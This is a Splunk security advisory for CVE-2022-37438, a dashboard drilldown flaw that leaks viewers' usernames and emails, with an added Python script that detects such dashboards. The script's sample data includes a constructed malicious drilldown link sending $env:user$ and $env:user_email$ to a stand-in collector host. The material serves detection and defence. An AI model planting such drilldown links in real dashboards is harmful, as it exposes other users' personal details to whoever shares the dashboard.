Information disclosure via the dashboard drilldown in Splunk Enterprise
Advisory ID: SVD-2022-0802
CVE ID: CVE-2022-37438
Published: 2022-08-16
Last Update: 2022-08-16
CVSSv3.1 Score: 2.6, Low
CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
CWE: CWE-200
Bug ID: SPL-221531
Description
In the Splunk Enterprise versions listed in the following table, an authenticated user can craft a dashboard that, when another user visits it and uses its drilldown component, could leak information about Splunk users (for example, username, email, and real name). Exploitation requires the access needed to create and share dashboards in Splunk Web.
Solution
For Splunk Enterprise, upgrade to version 8.1.11, 8.2.7.1, 9.0.1, or higher.
For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.
Product Status
Product | Version | Component | Affected Version | Fix Version |
---|---|---|---|---|
Splunk Enterprise | 8.1 | Splunk Web | 8.1.10 and lower | 8.1.11 |
Splunk Enterprise | 8.2 | Splunk Web | 8.2.0 to 8.2.7 | 8.2.7.1 |
Splunk Enterprise | 9.0 | Splunk Web | 9.0.0 | 9.0.1 |
Splunk Cloud Platform | | Splunk Web | 8.2.2203.4 and lower | 9.0.2205 |
Mitigations and Workarounds
You can mitigate this vulnerability by configuring permissions for dashboards and the knowledge objects that drive them.
Detections
This search uses REST functionality to query for dashboards whose URL options contain environment variables that could leak information about Splunk users. If an analyst sees results from this search, we suggest investigating to determine whether the disclosure of these environment variables was intended.
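The following is an added example, not Splunk's own detection search: a Python check that parses each dashboard's Simple XML (the `eai:data` field returned by the views REST endpoint) and reports drilldown links or token assignments that carry `$env:...$` tokens, which Splunk resolves to details about the viewing user. The sample entries are constructed; the REST fetch itself is left to the caller.

```python
import re
import xml.etree.ElementTree as ET

# Splunk Simple XML environment tokens ($env:user$, $env:user_email$, $env:user_realname$, ...)
# resolve to details about whichever user is viewing the dashboard.
ENV_TOKEN = re.compile(r"\$env:[A-Za-z_]+\$")

def find_env_token_drilldowns(simple_xml):
    """Return every <link>/<set> inside a <drilldown> whose value carries $env:...$ tokens."""
    hits = []
    for drilldown in ET.fromstring(simple_xml).iter("drilldown"):
        for el in drilldown:
            if el.tag not in ("link", "set"):
                continue
            value = (el.text or "").strip()
            tokens = sorted(set(ENV_TOKEN.findall(value)))
            if tokens:
                hits.append({"tag": el.tag, "value": value, "tokens": tokens})
    return hits

def scan_views(entries):
    """entries: the 'entry' list of GET /servicesNS/-/-/data/ui/views?output_mode=json&count=0
    (each item has name, acl.app, acl.owner and content['eai:data'] holding the view XML)."""
    findings = []
    for entry in entries:
        xml = entry.get("content", {}).get("eai:data") or ""
        try:
            hits = find_env_token_drilldowns(xml)
        except ET.ParseError:  # empty, HTML-only or malformed definitions: nothing to check
            continue
        acl = entry.get("acl", {})
        for hit in hits:
            findings.append({"view": entry.get("name"), "app": acl.get("app"),
                             "owner": acl.get("owner"), **hit})
    return findings

# Constructed sample entries in the shape of the REST response; not real data.
SAMPLE_ENTRIES = [
    {"name": "ops_overview", "acl": {"app": "search", "owner": "alice"}, "content": {"eai:data":
     "<dashboard><row><panel><table><search><query>index=_internal | stats count by sourcetype</query></search>"
     "<drilldown><link target=\"_blank\">https://tickets.example.invalid/new?st=$row.sourcetype$</link>"
     "</drilldown></table></panel></row></dashboard>"}},
    {"name": "shared_widget", "acl": {"app": "search", "owner": "mallory"}, "content": {"eai:data":
     "<dashboard><row><panel><single><search><query>| makeresults</query></search>"
     "<drilldown><link target=\"_blank\">https://collector.example.invalid/?u=$env:user$&amp;e=$env:user_email$</link>"
     "</drilldown></single></panel></row></dashboard>"}},
    {"name": "html_view", "acl": {"app": "search", "owner": "bob"}, "content": {"eai:data": ""}},
]

if __name__ == "__main__":
    for f in scan_views(SAMPLE_ENTRIES):
        print(f"{f['app']}/{f['view']} (owner {f['owner']}): {f['tag']} carries {', '.join(f['tokens'])}")
```

A hit is a lead, not a verdict: legitimate dashboards do use `$env:user$`, so review the link's destination and the dashboard's sharing permissions before acting.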
Severity
Splunk rates the severity as Low, 2.6, with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N. If Splunk Web is disabled on the Splunk Enterprise instance, the instance is not affected and the vulnerability is informational.
Acknowledgments
Eric LaMothe at Splunk